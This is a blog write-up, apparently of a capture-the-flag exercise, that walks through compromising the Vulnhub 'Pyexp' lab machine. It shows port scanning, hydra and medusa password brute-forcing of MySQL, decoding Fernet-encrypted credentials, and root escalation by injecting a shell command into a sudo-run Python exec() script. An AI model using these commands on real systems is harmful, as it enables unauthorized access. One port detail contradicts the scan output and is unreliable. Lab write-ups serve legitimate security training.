Vulnhub: Pyexp machine easy writeup and explanation

Posted on By Sagahiko No Comments on Vulnhub: Pyexp machine easy writeup and explanation
Vulnhub

This post is a writeup about Pyexp machine from Vulnhub.
You can check the machine from this link.

Scan open ports

The first thing that I always do is to scan open ports.
nmap -sC -sV 192.168.11.142 -p-
Here I check all ports of the target machine.
I got the following result.

1337/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 f7:af:6c:d1:26:94:dc:e5:1a:22:1a:64:4e:1c:34:a9 (RSA)
|   256 46:d2:8d:bd:2f:9e:af:ce:e2:45:5c:a6:12:c0:d9:19 (ECDSA)
|_  256 8d:11:ed:ff:7d:c5:a7:24:99:22:7f:ce:29:88:b2:4a (ED25519)
3306/tcp open  mysql   MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.23-MariaDB-0+deb10u1
|   Thread ID: 39
|   Capabilities flags: 63486
|   Some Capabilities: Speaks41ProtocolOld, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsTransactions, SupportsCompression, Speaks41ProtocolNew, ODBCClient, DontAllowDatabaseTableColumn, InteractiveClient, ConnectWithDatabase, IgnoreSigpipes, SupportsLoadDataLocal, LongColumnFlag, FoundRows, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: ,S=xdmx46S}@dXl5`eZq
|_  Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I noticed that ssh is open in 1337 port.
And the machine is using mysql service.

Inspecting Mysql

I first inspected the MySQL service since I don’t know the target machine’s credentials for ssh yet.

With the given version found in the nmap result, I tried to search for vulnerabilities.

However, I couldn’t find one. So I chose a tough way. Brute force.

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.11.142 mysql

I often use hydra for brute forcing. But, this time it didn’t go well.

It threw an error like this.

[ERROR] all children were disabled due too many connection errors

I tried with alternative tools. I checked medusa and ncrack.

Both of them worked well but ncrack was slightly faster.

medusa -u root -P /usr/share/wordlists/rockyou.txt -h 192.168.11.142 -M mysql

Then it shows me the credential of root.

ACCOUNT FOUND: [mysql] Host: 192.168.11.142 User: root Password: prettywoman [SUCCESS]

Good. Let’s log in with the credentials and see what databases are in there.

mysql -h 192.168.11.142 -u root -p

+--------------------+
| Database           |
+--------------------+
| data               |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+

The databases named data caught my eye.

I checked the tables inside the database.

+----------------+
| Tables_in_data |
+----------------+
| fernet         |
+----------------+

There’s a table called fernet.

I have no idea what it means. I queried values inside the table.

+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| cred                                                                                                                     | keyy                                         |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+

Ok, There are two columns. cred and keyy.

Both of them are encrypted so I think I need to decrypt them in the first place.

At the end of a little bit of googling, I found an [online tool](https://asecuritysite.com/tokens/ferdecode) to decode fernet encryption.

Actually, Python source codes for decoding fernet are also published in many github repositories. So, If you prefer using source code then go for it.

When I decoded the fernet values, I found the following credentials.

lucy:wJ9`“Lemdv9[FEw-

ssh connection

Thanks to the credentials found in the database, I managed to ssh to the target machine.

Be aware of the port number! It’s not 1337.

lucy@pyexp:~$ whoami
lucy

You can find the user flag in home directory.

The next mission is to get root privileges.

Privilege escalation

The first action I took was to check sudo permissions.

sudo -l
(root) NOPASSWD: /usr/bin/python2 /opt/exp.py

It shows I can sudo a Python script /opt/exp.py.

Before running the Python script, let’s check what is written.

uinput = raw_input('how are you?')
exec(uinput)

The variable uinput takes input from a user.

Then it executes the input using exec command.

It is very straightforward. I input the following command to open a bash shell.

sudo /usr/bin/python2 /opt/exp.py
how are you?import os;os.system("/bin/bash")

Then a bash shell is executed as a root user.
root@pyexp:/opt# whoami
root

You can find the root flag in the root directory.

This is the end of the machine.

Conclusion

This machine was easy to exploit and very straightforward.

Takeaways from this machine are two things.

  1. Uncommonly it requires trying brute force to achieve credentials.
  2. Need knowledge about fernet encryption.

I hope this write-up was helpful.

Thanks for reading.

2

Leave a Reply

Your email address will not be published. Required fields are marked *